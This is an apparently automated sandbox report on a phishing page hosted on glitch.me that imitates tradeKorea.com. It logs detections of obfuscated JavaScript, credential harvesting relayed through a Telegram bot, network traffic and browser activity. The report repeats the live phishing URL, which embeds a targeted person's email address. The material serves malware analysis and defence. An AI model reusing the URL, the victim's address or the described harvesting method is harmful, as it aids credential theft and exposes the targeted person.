Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... This code exhibits multiple high-risk characteristics: heavy obfuscation using string encoding and character replacement, use of the Function constructor (dynamic code execution), complex string manipulation to hide functionality, and suspicious character patterns. The code appears deliberately obscured to evade detection, which is a common malware technique.
Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... High-risk malicious script: Contains credential harvesting functionality, sends stolen credentials via Telegram bot (exposed token), collects sensitive user data (email, password, IP, browser info), and includes data exfiltration to external services. Shows clear phishing characteristics with email validation and password collection.

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

HTML body contains low number of good links

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

HTTP Parser: Title: tradeKorea.com: Verified Korean Suppliers and Products does not match URL

Javascript checks online IP of machine

URL contains potential PII (phishing indication)

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c

HTTP Parser: <input type="password" .../> found

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="author".. found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="author".. found

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="copyright".. found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49729 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 27MB later: 36MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10

Source: global traffic	DNS traffic detected: DNS query: newkr-projectx.glitch.me
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.tradekorea.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: i.gyazo.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: kita.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49729 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@17/17@34/209

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1968,i,3655654666205261130,14224367164820248221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1968,i,3655654666205261130,14224367164820248221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

ID:	1571507
Product:	CloudBasic
Start time:	14:13:06
Start date:	09.12.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Windows Analysis Report
https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1